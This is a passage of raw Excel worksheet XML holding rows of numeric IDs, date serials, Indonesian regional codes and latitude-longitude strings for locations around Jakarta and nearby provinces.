        <f t="shared" si="26"/>
        <v>-6.13956,106.77318</v>
      </c>
    </row>
    <row r="1699" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1699">
        <v>109224</v>
      </c>
      <c r="B1699" s="1">
        <v>43886</v>
      </c>
      <c r="C1699">
        <v>0</v>
      </c>
      <c r="D1699" t="s">
        <v>22</v>
      </c>
      <c r="E1699" t="s">
        <v>23</v>
      </c>
      <c r="F1699" t="s">
        <v>5824</v>
      </c>
      <c r="G1699" t="s">
        <v>5825</v>
      </c>
      <c r="H1699" t="s">
        <v>26</v>
      </c>
      <c r="I1699" t="s">
        <v>704</v>
      </c>
      <c r="J1699" t="s">
        <v>5826</v>
      </c>
      <c r="L1699" t="s">
        <v>5827</v>
      </c>
      <c r="M1699">
        <v>3175050003</v>
      </c>
      <c r="N1699">
        <v>3175050</v>
      </c>
      <c r="O1699">
        <v>3175</v>
      </c>
      <c r="P1699">
        <v>31</v>
      </c>
      <c r="Q1699" t="s">
        <v>1740</v>
      </c>
      <c r="R1699" t="s">
        <v>1013</v>
      </c>
      <c r="S1699" t="s">
        <v>547</v>
      </c>
      <c r="T1699" t="s">
        <v>33</v>
      </c>
      <c r="U1699" s="5">
        <v>10691619</v>
      </c>
      <c r="V1699" s="5" t="s">
        <v>15990</v>
      </c>
      <c r="W1699" s="5">
        <v>-615445</v>
      </c>
      <c r="X1699" t="s">
        <v>19756</v>
      </c>
      <c r="Y1699" t="str">
        <f t="shared" si="26"/>
        <v>-6.15445,106.91619</v>
      </c>
    </row>
    <row r="1700" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1700">
        <v>109225</v>
      </c>
      <c r="B1700" s="1">
        <v>43886</v>
      </c>
      <c r="C1700">
        <v>0</v>
      </c>
      <c r="D1700" t="s">
        <v>22</v>
      </c>
      <c r="E1700" t="s">
        <v>23</v>
      </c>
      <c r="F1700" t="s">
        <v>5828</v>
      </c>
      <c r="G1700" t="s">
        <v>5829</v>
      </c>
      <c r="H1700" t="s">
        <v>26</v>
      </c>
      <c r="I1700" t="s">
        <v>5830</v>
      </c>
      <c r="J1700" t="s">
        <v>5831</v>
      </c>
      <c r="M1700">
        <v>3171070001</v>
      </c>
      <c r="N1700">
        <v>3171070</v>
      </c>
      <c r="O1700">
        <v>3171</v>
      </c>
      <c r="P1700">
        <v>31</v>
      </c>
      <c r="Q1700" t="s">
        <v>120</v>
      </c>
      <c r="R1700" t="s">
        <v>121</v>
      </c>
      <c r="S1700" t="s">
        <v>108</v>
      </c>
      <c r="T1700" t="s">
        <v>33</v>
      </c>
      <c r="U1700" s="5">
        <v>10681415</v>
      </c>
      <c r="V1700" s="5" t="s">
        <v>15991</v>
      </c>
      <c r="W1700" s="5">
        <v>-626741</v>
      </c>
      <c r="X1700" t="s">
        <v>19158</v>
      </c>
      <c r="Y1700" t="str">
        <f t="shared" si="26"/>
        <v>-6.26741,106.81415</v>
      </c>
    </row>
    <row r="1701" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1701">
        <v>109226</v>
      </c>
      <c r="B1701" s="1">
        <v>43886</v>
      </c>
      <c r="C1701">
        <v>0</v>
      </c>
      <c r="D1701" t="s">
        <v>22</v>
      </c>
      <c r="E1701" t="s">
        <v>23</v>
      </c>
      <c r="F1701" t="s">
        <v>5832</v>
      </c>
      <c r="G1701" t="s">
        <v>5833</v>
      </c>
      <c r="H1701" t="s">
        <v>26</v>
      </c>
      <c r="I1701" t="s">
        <v>3062</v>
      </c>
      <c r="J1701" t="s">
        <v>3157</v>
      </c>
      <c r="L1701" t="s">
        <v>5834</v>
      </c>
      <c r="M1701">
        <v>3172070001</v>
      </c>
      <c r="N1701">
        <v>3172070</v>
      </c>
      <c r="O1701">
        <v>3172</v>
      </c>
      <c r="P1701">
        <v>31</v>
      </c>
      <c r="Q1701" t="s">
        <v>127</v>
      </c>
      <c r="R1701" t="s">
        <v>128</v>
      </c>
      <c r="S1701" t="s">
        <v>49</v>
      </c>
      <c r="T1701" t="s">
        <v>33</v>
      </c>
      <c r="U1701" s="5">
        <v>10689474</v>
      </c>
      <c r="V1701" s="5" t="s">
        <v>15992</v>
      </c>
      <c r="W1701" s="5">
        <v>-623488</v>
      </c>
      <c r="X1701" t="s">
        <v>19757</v>
      </c>
      <c r="Y1701" t="str">
        <f t="shared" si="26"/>
        <v>-6.23488,106.89474</v>
      </c>
    </row>
    <row r="1702" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1702">
        <v>109227</v>
      </c>
      <c r="B1702" s="1">
        <v>43886</v>
      </c>
      <c r="C1702">
        <v>0</v>
      </c>
      <c r="D1702" t="s">
        <v>22</v>
      </c>
      <c r="E1702" t="s">
        <v>23</v>
      </c>
      <c r="F1702" t="s">
        <v>5835</v>
      </c>
      <c r="H1702" t="s">
        <v>26</v>
      </c>
      <c r="I1702" t="s">
        <v>3407</v>
      </c>
      <c r="J1702" t="s">
        <v>4986</v>
      </c>
      <c r="L1702" t="s">
        <v>250</v>
      </c>
      <c r="M1702">
        <v>3174070004</v>
      </c>
      <c r="N1702">
        <v>3174070</v>
      </c>
      <c r="O1702">
        <v>3174</v>
      </c>
      <c r="P1702">
        <v>31</v>
      </c>
      <c r="Q1702" t="s">
        <v>926</v>
      </c>
      <c r="R1702" t="s">
        <v>84</v>
      </c>
      <c r="S1702" t="s">
        <v>32</v>
      </c>
      <c r="T1702" t="s">
        <v>33</v>
      </c>
      <c r="U1702" s="5">
        <v>10676328</v>
      </c>
      <c r="V1702" s="5" t="s">
        <v>15993</v>
      </c>
      <c r="W1702" s="5">
        <v>-613902</v>
      </c>
      <c r="X1702" t="s">
        <v>19758</v>
      </c>
      <c r="Y1702" t="str">
        <f t="shared" si="26"/>
        <v>-6.13902,106.76328</v>
      </c>
    </row>
    <row r="1703" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1703">
        <v>109228</v>
      </c>
      <c r="B1703" s="1">
        <v>43886</v>
      </c>
      <c r="C1703">
        <v>0</v>
      </c>
      <c r="D1703" t="s">
        <v>22</v>
      </c>
      <c r="E1703" t="s">
        <v>23</v>
      </c>
      <c r="F1703" t="s">
        <v>5836</v>
      </c>
      <c r="G1703" t="s">
        <v>5837</v>
      </c>
      <c r="H1703" t="s">
        <v>26</v>
      </c>
      <c r="I1703" t="s">
        <v>517</v>
      </c>
      <c r="J1703" t="s">
        <v>2036</v>
      </c>
      <c r="L1703" t="s">
        <v>5838</v>
      </c>
      <c r="M1703">
        <v>3173070001</v>
      </c>
      <c r="N1703">
        <v>3173070</v>
      </c>
      <c r="O1703">
        <v>3173</v>
      </c>
      <c r="P1703">
        <v>31</v>
      </c>
      <c r="Q1703" t="s">
        <v>322</v>
      </c>
      <c r="R1703" t="s">
        <v>323</v>
      </c>
      <c r="S1703" t="s">
        <v>62</v>
      </c>
      <c r="T1703" t="s">
        <v>33</v>
      </c>
      <c r="U1703" s="5">
        <v>10683442</v>
      </c>
      <c r="V1703" s="5" t="s">
        <v>15994</v>
      </c>
      <c r="W1703" s="5">
        <v>-616024</v>
      </c>
      <c r="X1703" t="s">
        <v>19759</v>
      </c>
      <c r="Y1703" t="str">
        <f t="shared" si="26"/>
        <v>-6.16024,106.83442</v>
      </c>
    </row>
    <row r="1704" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1704">
        <v>109229</v>
      </c>
      <c r="B1704" s="1">
        <v>43886</v>
      </c>
      <c r="C1704">
        <v>0</v>
      </c>
      <c r="D1704" t="s">
        <v>22</v>
      </c>
      <c r="E1704" t="s">
        <v>23</v>
      </c>
      <c r="F1704" t="s">
        <v>5839</v>
      </c>
      <c r="G1704" t="s">
        <v>5840</v>
      </c>
      <c r="H1704" t="s">
        <v>26</v>
      </c>
      <c r="I1704" t="s">
        <v>1729</v>
      </c>
      <c r="J1704" t="s">
        <v>2627</v>
      </c>
      <c r="L1704" t="s">
        <v>5841</v>
      </c>
      <c r="M1704">
        <v>3216082004</v>
      </c>
      <c r="N1704">
        <v>3216082</v>
      </c>
      <c r="O1704">
        <v>3216</v>
      </c>
      <c r="P1704">
        <v>32</v>
      </c>
      <c r="Q1704" t="s">
        <v>5842</v>
      </c>
      <c r="R1704" t="s">
        <v>601</v>
      </c>
      <c r="S1704" t="s">
        <v>41</v>
      </c>
      <c r="T1704" t="s">
        <v>42</v>
      </c>
      <c r="U1704" s="5">
        <v>10704504</v>
      </c>
      <c r="V1704" s="5" t="s">
        <v>15995</v>
      </c>
      <c r="W1704" s="5">
        <v>-619686</v>
      </c>
      <c r="X1704" t="s">
        <v>19760</v>
      </c>
      <c r="Y1704" t="str">
        <f t="shared" si="26"/>
        <v>-6.19686,107.04504</v>
      </c>
    </row>
    <row r="1705" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1705">
        <v>109230</v>
      </c>
      <c r="B1705" s="1">
        <v>43886</v>
      </c>
      <c r="C1705">
        <v>0</v>
      </c>
      <c r="D1705" t="s">
        <v>22</v>
      </c>
      <c r="E1705" t="s">
        <v>23</v>
      </c>
      <c r="F1705" t="s">
        <v>5843</v>
      </c>
      <c r="G1705" t="s">
        <v>5844</v>
      </c>
      <c r="H1705" t="s">
        <v>26</v>
      </c>
      <c r="I1705" t="s">
        <v>367</v>
      </c>
      <c r="J1705" t="s">
        <v>3135</v>
      </c>
      <c r="L1705" t="s">
        <v>5845</v>
      </c>
      <c r="M1705">
        <v>3603030004</v>
      </c>
      <c r="N1705">
        <v>3603030</v>
      </c>
      <c r="O1705">
        <v>3603</v>
      </c>
      <c r="P1705">
        <v>36</v>
      </c>
      <c r="Q1705" t="s">
        <v>2091</v>
      </c>
      <c r="R1705" t="s">
        <v>2091</v>
      </c>
      <c r="S1705" t="s">
        <v>201</v>
      </c>
      <c r="T1705" t="s">
        <v>171</v>
      </c>
      <c r="U1705" s="5">
        <v>10652323</v>
      </c>
      <c r="V1705" s="5" t="s">
        <v>15996</v>
      </c>
      <c r="W1705" s="5">
        <v>-622873</v>
      </c>
      <c r="X1705" t="s">
        <v>19761</v>
      </c>
      <c r="Y1705" t="str">
        <f t="shared" si="26"/>
        <v>-6.22873,106.52323</v>
      </c>
    </row>
    <row r="1706" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1706">
        <v>109231</v>
      </c>
      <c r="B1706" s="1">
        <v>43886</v>
      </c>
      <c r="C1706">
        <v>0</v>
      </c>
      <c r="D1706" t="s">
        <v>22</v>
      </c>
      <c r="E1706" t="s">
        <v>23</v>
      </c>
      <c r="F1706" t="s">
        <v>5846</v>
      </c>
      <c r="G1706" t="s">
        <v>5847</v>
      </c>
      <c r="H1706" t="s">
        <v>26</v>
      </c>
      <c r="I1706" t="s">
        <v>290</v>
      </c>
      <c r="J1706" t="s">
        <v>5848</v>
      </c>
      <c r="L1706" t="s">
        <v>5849</v>
      </c>
      <c r="M1706">
        <v>3173030006</v>
      </c>
      <c r="N1706">
        <v>3173030</v>
      </c>
      <c r="O1706">
        <v>3173</v>
      </c>
      <c r="P1706">
        <v>31</v>
      </c>
      <c r="Q1706" t="s">
        <v>5850</v>
      </c>
      <c r="R1706" t="s">
        <v>3128</v>
      </c>
      <c r="S1706" t="s">
        <v>62</v>
      </c>
      <c r="T1706" t="s">
        <v>33</v>
      </c>
      <c r="U1706" s="5">
        <v>10684386</v>
      </c>
      <c r="V1706" s="5" t="s">
        <v>15997</v>
      </c>
      <c r="W1706" s="5">
        <v>-616863</v>
      </c>
      <c r="X1706" t="s">
        <v>19762</v>
      </c>
      <c r="Y1706" t="str">
        <f t="shared" si="26"/>
        <v>-6.16863,106.84386</v>
      </c>
    </row>
    <row r="1707" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1707">
        <v>109232</v>
      </c>
      <c r="B1707" s="1">
        <v>43886</v>
      </c>
      <c r="C1707">
        <v>0</v>
      </c>
      <c r="D1707" t="s">
        <v>22</v>
      </c>
      <c r="E1707" t="s">
        <v>23</v>
      </c>
      <c r="F1707" t="s">
        <v>5851</v>
      </c>
      <c r="G1707" t="s">
        <v>5852</v>
      </c>
      <c r="H1707" t="s">
        <v>26</v>
      </c>
      <c r="I1707" t="s">
        <v>517</v>
      </c>
      <c r="J1707" t="s">
        <v>3693</v>
      </c>
      <c r="L1707" t="s">
        <v>5853</v>
      </c>
      <c r="M1707">
        <v>3175050003</v>
      </c>
      <c r="N1707">
        <v>3175050</v>
      </c>
      <c r="O1707">
        <v>3175</v>
      </c>
      <c r="P1707">
        <v>31</v>
      </c>
      <c r="Q1707" t="s">
        <v>1740</v>
      </c>
      <c r="R1707" t="s">
        <v>1013</v>
      </c>
      <c r="S1707" t="s">
        <v>547</v>
      </c>
      <c r="T1707" t="s">
        <v>33</v>
      </c>
      <c r="U1707" s="5">
        <v>10691242</v>
      </c>
      <c r="V1707" s="5" t="s">
        <v>15998</v>
      </c>
      <c r="W1707" s="5">
        <v>-616710</v>
      </c>
      <c r="X1707" t="s">
        <v>19763</v>
      </c>
      <c r="Y1707" t="str">
        <f t="shared" si="26"/>
        <v>-6.16710,106.91242</v>
      </c>
    </row>
    <row r="1708" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1708">
        <v>109233</v>
      </c>
      <c r="B1708" s="1">
        <v>43886</v>
      </c>
      <c r="C1708">
        <v>0</v>
      </c>
      <c r="D1708" t="s">
        <v>22</v>
      </c>
      <c r="E1708" t="s">
        <v>23</v>
      </c>
      <c r="F1708" t="s">
        <v>5854</v>
      </c>
      <c r="G1708" t="s">
        <v>5855</v>
      </c>
      <c r="H1708" t="s">
        <v>26</v>
      </c>
      <c r="I1708" t="s">
        <v>3603</v>
      </c>
      <c r="J1708" t="s">
        <v>5856</v>
      </c>
      <c r="L1708" t="s">
        <v>5857</v>
      </c>
      <c r="M1708">
        <v>3174040005</v>
      </c>
      <c r="N1708">
        <v>3174040</v>
      </c>
      <c r="O1708">
        <v>3174</v>
      </c>
      <c r="P1708">
        <v>31</v>
      </c>
      <c r="Q1708" t="s">
        <v>376</v>
      </c>
      <c r="R1708" t="s">
        <v>377</v>
      </c>
      <c r="S1708" t="s">
        <v>32</v>
      </c>
      <c r="T1708" t="s">
        <v>33</v>
      </c>
      <c r="U1708" s="5">
        <v>10678489</v>
      </c>
      <c r="V1708" s="5" t="s">
        <v>15999</v>
      </c>
      <c r="W1708" s="5">
        <v>-615939</v>
      </c>
      <c r="X1708" t="s">
        <v>19422</v>
      </c>
      <c r="Y1708" t="str">
        <f t="shared" si="26"/>
        <v>-6.15939,106.78489</v>
      </c>
    </row>
    <row r="1709" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1709">
        <v>109234</v>
      </c>
      <c r="B1709" s="1">
        <v>43886</v>
      </c>
      <c r="C1709">
        <v>0</v>
      </c>
      <c r="D1709" t="s">
        <v>22</v>
      </c>
      <c r="E1709" t="s">
        <v>23</v>
      </c>
      <c r="F1709" t="s">
        <v>5858</v>
      </c>
      <c r="H1709" t="s">
        <v>26</v>
      </c>
      <c r="I1709" t="s">
        <v>27</v>
      </c>
      <c r="J1709" t="s">
        <v>5859</v>
      </c>
      <c r="L1709" t="s">
        <v>5860</v>
      </c>
      <c r="M1709">
        <v>3175050001</v>
      </c>
      <c r="N1709">
        <v>3175050</v>
      </c>
      <c r="O1709">
        <v>3175</v>
      </c>
      <c r="P1709">
        <v>31</v>
      </c>
      <c r="Q1709" t="s">
        <v>1037</v>
      </c>
      <c r="R1709" t="s">
        <v>1013</v>
      </c>
      <c r="S1709" t="s">
        <v>547</v>
      </c>
      <c r="T1709" t="s">
        <v>33</v>
      </c>
      <c r="U1709" s="5">
        <v>10689673</v>
      </c>
      <c r="V1709" s="5" t="s">
        <v>16000</v>
      </c>
      <c r="W1709" s="5">
        <v>-614423</v>
      </c>
      <c r="X1709" t="s">
        <v>19764</v>
      </c>
      <c r="Y1709" t="str">
        <f t="shared" si="26"/>
        <v>-6.14423,106.89673</v>
      </c>
    </row>
    <row r="1710" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1710">
        <v>109235</v>
      </c>
      <c r="B1710" s="1">
        <v>43886</v>
      </c>
      <c r="C1710">
        <v>0</v>
      </c>
      <c r="D1710" t="s">
        <v>22</v>
      </c>
      <c r="E1710" t="s">
        <v>23</v>
      </c>
      <c r="F1710" t="s">
        <v>5861</v>
      </c>
      <c r="G1710" t="s">
        <v>5862</v>
      </c>
      <c r="H1710" t="s">
        <v>26</v>
      </c>
      <c r="I1710" t="s">
        <v>27</v>
      </c>
      <c r="J1710" t="s">
        <v>2627</v>
      </c>
      <c r="L1710" t="s">
        <v>5863</v>
      </c>
      <c r="M1710">
        <v>3216010013</v>
      </c>
      <c r="N1710">
        <v>3216010</v>
      </c>
      <c r="O1710">
        <v>3216</v>
      </c>
      <c r="P1710">
        <v>32</v>
      </c>
      <c r="Q1710" t="s">
        <v>5864</v>
      </c>
      <c r="R1710" t="s">
        <v>1256</v>
      </c>
      <c r="S1710" t="s">
        <v>41</v>
      </c>
      <c r="T1710" t="s">
        <v>42</v>
      </c>
      <c r="U1710" s="5">
        <v>10705069</v>
      </c>
      <c r="V1710" s="5" t="s">
        <v>16001</v>
      </c>
      <c r="W1710" s="5">
        <v>-632511</v>
      </c>
      <c r="X1710" t="s">
        <v>19765</v>
      </c>
      <c r="Y1710" t="str">
        <f t="shared" si="26"/>
        <v>-6.32511,107.05069</v>
      </c>
    </row>
    <row r="1711" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1711">
        <v>109236</v>
      </c>
      <c r="B1711" s="1">
        <v>43886</v>
      </c>
      <c r="C1711">
        <v>0</v>
      </c>
      <c r="D1711" t="s">
        <v>22</v>
      </c>
      <c r="E1711" t="s">
        <v>23</v>
      </c>
      <c r="F1711" t="s">
        <v>5865</v>
      </c>
      <c r="G1711" t="s">
        <v>5866</v>
      </c>
      <c r="H1711" t="s">
        <v>26</v>
      </c>
      <c r="I1711" t="s">
        <v>2165</v>
      </c>
      <c r="J1711" t="s">
        <v>2740</v>
      </c>
      <c r="L1711" t="s">
        <v>5867</v>
      </c>
      <c r="M1711">
        <v>3173070003</v>
      </c>
      <c r="N1711">
        <v>3173070</v>
      </c>
      <c r="O1711">
        <v>3173</v>
      </c>
      <c r="P1711">
        <v>31</v>
      </c>
      <c r="Q1711" t="s">
        <v>520</v>
      </c>
      <c r="R1711" t="s">
        <v>323</v>
      </c>
      <c r="S1711" t="s">
        <v>62</v>
      </c>
      <c r="T1711" t="s">
        <v>33</v>
      </c>
      <c r="U1711" s="5">
        <v>10683348</v>
      </c>
      <c r="V1711" s="5" t="s">
        <v>16002</v>
      </c>
      <c r="W1711" s="5">
        <v>-615212</v>
      </c>
      <c r="X1711" t="s">
        <v>19766</v>
      </c>
      <c r="Y1711" t="str">
        <f t="shared" si="26"/>
        <v>-6.15212,106.83348</v>
      </c>
    </row>
    <row r="1712" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1712">
        <v>109237</v>
      </c>
      <c r="B1712" s="1">
        <v>43886</v>
      </c>
      <c r="C1712">
        <v>0</v>
      </c>
      <c r="D1712" t="s">
        <v>22</v>
      </c>
      <c r="E1712" t="s">
        <v>23</v>
      </c>
      <c r="F1712" t="s">
        <v>5868</v>
      </c>
      <c r="G1712" t="s">
        <v>5869</v>
      </c>
      <c r="H1712" t="s">
        <v>26</v>
      </c>
      <c r="I1712" t="s">
        <v>5870</v>
      </c>
      <c r="J1712" t="s">
        <v>5871</v>
      </c>
      <c r="L1712" t="s">
        <v>5872</v>
      </c>
      <c r="M1712">
        <v>3173060003</v>
      </c>
      <c r="N1712">
        <v>3173060</v>
      </c>
      <c r="O1712">
        <v>3173</v>
      </c>
      <c r="P1712">
        <v>31</v>
      </c>
      <c r="Q1712" t="s">
        <v>3773</v>
      </c>
      <c r="R1712" t="s">
        <v>61</v>
      </c>
      <c r="S1712" t="s">
        <v>62</v>
      </c>
      <c r="T1712" t="s">
        <v>33</v>
      </c>
      <c r="U1712" s="5">
        <v>10687027</v>
      </c>
      <c r="V1712" s="5" t="s">
        <v>15314</v>
      </c>
      <c r="W1712" s="5">
        <v>-616141</v>
      </c>
      <c r="X1712" t="s">
        <v>19767</v>
      </c>
      <c r="Y1712" t="str">
        <f t="shared" si="26"/>
        <v>-6.16141,106.87027</v>
      </c>
    </row>
    <row r="1713" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1713">
        <v>109238</v>
      </c>
      <c r="B1713" s="1">
        <v>43886</v>
      </c>
      <c r="C1713">
        <v>0</v>
      </c>
      <c r="D1713" t="s">
        <v>22</v>
      </c>
      <c r="E1713" t="s">
        <v>23</v>
      </c>
      <c r="F1713" t="s">
        <v>5873</v>
      </c>
      <c r="G1713" t="s">
        <v>5874</v>
      </c>
      <c r="H1713" t="s">
        <v>26</v>
      </c>
      <c r="I1713" t="s">
        <v>492</v>
      </c>
      <c r="J1713" t="s">
        <v>3135</v>
      </c>
      <c r="L1713" t="s">
        <v>5875</v>
      </c>
      <c r="M1713">
        <v>3603051005</v>
      </c>
      <c r="N1713">
        <v>3603051</v>
      </c>
      <c r="O1713">
        <v>3603</v>
      </c>
      <c r="P1713">
        <v>36</v>
      </c>
      <c r="Q1713" t="s">
        <v>3998</v>
      </c>
      <c r="R1713" t="s">
        <v>257</v>
      </c>
      <c r="S1713" t="s">
        <v>201</v>
      </c>
      <c r="T1713" t="s">
        <v>171</v>
      </c>
      <c r="U1713" s="5">
        <v>10659575</v>
      </c>
      <c r="V1713" s="5" t="s">
        <v>16003</v>
      </c>
      <c r="W1713" s="5">
        <v>-620705</v>
      </c>
      <c r="X1713" t="s">
        <v>19768</v>
      </c>
      <c r="Y1713" t="str">
        <f t="shared" si="26"/>
        <v>-6.20705,106.59575</v>
      </c>
    </row>
    <row r="1714" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1714">
        <v>109239</v>
      </c>
      <c r="B1714" s="1">
        <v>43886</v>
      </c>
      <c r="C1714">
        <v>0</v>
      </c>
      <c r="D1714" t="s">
        <v>22</v>
      </c>
      <c r="E1714" t="s">
        <v>23</v>
      </c>
      <c r="F1714" t="s">
        <v>5876</v>
      </c>
      <c r="G1714" t="s">
        <v>5877</v>
      </c>
      <c r="H1714" t="s">
        <v>26</v>
      </c>
      <c r="I1714" t="s">
        <v>792</v>
      </c>
      <c r="J1714" t="s">
        <v>2627</v>
      </c>
      <c r="L1714" t="s">
        <v>5878</v>
      </c>
      <c r="M1714">
        <v>3275010008</v>
      </c>
      <c r="N1714">
        <v>3275010</v>
      </c>
      <c r="O1714">
        <v>3275</v>
      </c>
      <c r="P1714">
        <v>32</v>
      </c>
      <c r="Q1714" t="s">
        <v>2236</v>
      </c>
      <c r="R1714" t="s">
        <v>287</v>
      </c>
      <c r="S1714" t="s">
        <v>41</v>
      </c>
      <c r="T1714" t="s">
        <v>42</v>
      </c>
      <c r="U1714" s="5">
        <v>10693839</v>
      </c>
      <c r="V1714" s="5" t="s">
        <v>16004</v>
      </c>
      <c r="W1714" s="5">
        <v>-627995</v>
      </c>
      <c r="X1714" t="s">
        <v>19769</v>
      </c>
      <c r="Y1714" t="str">
        <f t="shared" si="26"/>
        <v>-6.27995,106.93839</v>
      </c>
    </row>
    <row r="1715" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1715">
        <v>109240</v>
      </c>
      <c r="B1715" s="1">
        <v>43886</v>
      </c>
      <c r="C1715">
        <v>0</v>
      </c>
      <c r="D1715" t="s">
        <v>22</v>
      </c>
      <c r="E1715" t="s">
        <v>23</v>
      </c>
      <c r="F1715" t="s">
        <v>5879</v>
      </c>
      <c r="G1715" t="s">
        <v>5880</v>
      </c>
      <c r="H1715" t="s">
        <v>26</v>
      </c>
      <c r="I1715" t="s">
        <v>1394</v>
      </c>
      <c r="J1715" t="s">
        <v>5881</v>
      </c>
      <c r="L1715" t="s">
        <v>5882</v>
      </c>
      <c r="M1715">
        <v>3174020007</v>
      </c>
      <c r="N1715">
        <v>3174020</v>
      </c>
      <c r="O1715">
        <v>3174</v>
      </c>
      <c r="P1715">
        <v>31</v>
      </c>
      <c r="Q1715" t="s">
        <v>95</v>
      </c>
      <c r="R1715" t="s">
        <v>31</v>
      </c>
      <c r="S1715" t="s">
        <v>32</v>
      </c>
      <c r="T1715" t="s">
        <v>33</v>
      </c>
      <c r="U1715" s="5">
        <v>10676297</v>
      </c>
      <c r="V1715" s="5" t="s">
        <v>16005</v>
      </c>
      <c r="W1715" s="5">
        <v>-616577</v>
      </c>
      <c r="X1715" t="s">
        <v>18489</v>
      </c>
      <c r="Y1715" t="str">
        <f t="shared" si="26"/>
        <v>-6.16577,106.76297</v>
      </c>
    </row>
    <row r="1716" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1716">
        <v>109241</v>
      </c>
      <c r="B1716" s="1">
        <v>43886</v>
      </c>
      <c r="C1716">
        <v>0</v>
      </c>
      <c r="D1716" t="s">
        <v>22</v>
      </c>
      <c r="E1716" t="s">
        <v>23</v>
      </c>
      <c r="F1716" t="s">
        <v>5883</v>
      </c>
      <c r="H1716" t="s">
        <v>26</v>
      </c>
      <c r="I1716" t="s">
        <v>517</v>
      </c>
      <c r="J1716" t="s">
        <v>5884</v>
      </c>
      <c r="M1716">
        <v>3174060002</v>
      </c>
      <c r="N1716">
        <v>3174060</v>
      </c>
      <c r="O1716">
        <v>3174</v>
      </c>
      <c r="P1716">
        <v>31</v>
      </c>
      <c r="Q1716" t="s">
        <v>1761</v>
      </c>
      <c r="R1716" t="s">
        <v>1762</v>
      </c>
      <c r="S1716" t="s">
        <v>32</v>
      </c>
      <c r="T1716" t="s">
        <v>33</v>
      </c>
      <c r="U1716" s="5">
        <v>10682696</v>
      </c>
      <c r="V1716" s="5" t="s">
        <v>16006</v>
      </c>
      <c r="W1716" s="5">
        <v>-616046</v>
      </c>
      <c r="X1716" t="s">
        <v>19770</v>
      </c>
      <c r="Y1716" t="str">
        <f t="shared" si="26"/>
        <v>-6.16046,106.82696</v>
      </c>
    </row>
    <row r="1717" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1717">
        <v>109242</v>
      </c>
      <c r="B1717" s="1">
        <v>43886</v>
      </c>
      <c r="C1717">
        <v>0</v>
      </c>
      <c r="D1717" t="s">
        <v>22</v>
      </c>
      <c r="E1717" t="s">
        <v>23</v>
      </c>
      <c r="F1717" t="s">
        <v>5885</v>
      </c>
      <c r="G1717" t="s">
        <v>5886</v>
      </c>
      <c r="H1717" t="s">
        <v>26</v>
      </c>
      <c r="I1717" t="s">
        <v>166</v>
      </c>
      <c r="J1717" t="s">
        <v>5887</v>
      </c>
      <c r="M1717">
        <v>3172070002</v>
      </c>
      <c r="N1717">
        <v>3172070</v>
      </c>
      <c r="O1717">
        <v>3172</v>
      </c>
      <c r="P1717">
        <v>31</v>
      </c>
      <c r="Q1717" t="s">
        <v>128</v>
      </c>
      <c r="R1717" t="s">
        <v>128</v>
      </c>
      <c r="S1717" t="s">
        <v>49</v>
      </c>
      <c r="T1717" t="s">
        <v>33</v>
      </c>
      <c r="U1717" s="5">
        <v>10691302</v>
      </c>
      <c r="V1717" s="5" t="s">
        <v>15344</v>
      </c>
      <c r="W1717" s="5">
        <v>-623427</v>
      </c>
      <c r="X1717" t="s">
        <v>19771</v>
      </c>
      <c r="Y1717" t="str">
        <f t="shared" si="26"/>
        <v>-6.23427,106.91302</v>
      </c>
    </row>
    <row r="1718" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1718">
        <v>109244</v>
      </c>
      <c r="B1718" s="1">
        <v>43886</v>
      </c>
      <c r="C1718">
        <v>0</v>
      </c>
      <c r="D1718" t="s">
        <v>22</v>
      </c>
      <c r="E1718" t="s">
        <v>23</v>
      </c>
      <c r="F1718" t="s">
        <v>5888</v>
      </c>
      <c r="G1718" t="s">
        <v>5889</v>
      </c>
      <c r="H1718" t="s">
        <v>26</v>
      </c>
      <c r="I1718" t="s">
        <v>1253</v>
      </c>
      <c r="J1718" t="s">
        <v>5890</v>
      </c>
      <c r="L1718" t="s">
        <v>5891</v>
      </c>
      <c r="M1718">
        <v>3173010002</v>
      </c>
      <c r="N1718">
        <v>3173010</v>
      </c>
      <c r="O1718">
        <v>3173</v>
      </c>
      <c r="P1718">
        <v>31</v>
      </c>
      <c r="Q1718" t="s">
        <v>4908</v>
      </c>
      <c r="R1718" t="s">
        <v>1481</v>
      </c>
      <c r="S1718" t="s">
        <v>62</v>
      </c>
      <c r="T1718" t="s">
        <v>33</v>
      </c>
      <c r="U1718" s="5">
        <v>10680882</v>
      </c>
      <c r="V1718" s="5" t="s">
        <v>16007</v>
      </c>
      <c r="W1718" s="5">
        <v>-620933</v>
      </c>
      <c r="X1718" t="s">
        <v>19772</v>
      </c>
      <c r="Y1718" t="str">
        <f t="shared" si="26"/>
        <v>-6.20933,106.80882</v>
      </c>
    </row>
    <row r="1719" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1719">
        <v>109245</v>
      </c>
      <c r="B1719" s="1">
        <v>43886</v>
      </c>
      <c r="C1719">
        <v>0</v>
      </c>
      <c r="D1719" t="s">
        <v>22</v>
      </c>
      <c r="E1719" t="s">
        <v>23</v>
      </c>
      <c r="F1719" t="s">
        <v>5892</v>
      </c>
      <c r="G1719" t="s">
        <v>5893</v>
      </c>
      <c r="H1719" t="s">
        <v>26</v>
      </c>
      <c r="I1719" t="s">
        <v>1538</v>
      </c>
      <c r="J1719" t="s">
        <v>1355</v>
      </c>
      <c r="L1719" t="s">
        <v>5894</v>
      </c>
      <c r="M1719">
        <v>3174070002</v>
      </c>
      <c r="N1719">
        <v>3174070</v>
      </c>
      <c r="O1719">
        <v>3174</v>
      </c>
      <c r="P1719">
        <v>31</v>
      </c>
      <c r="Q1719" t="s">
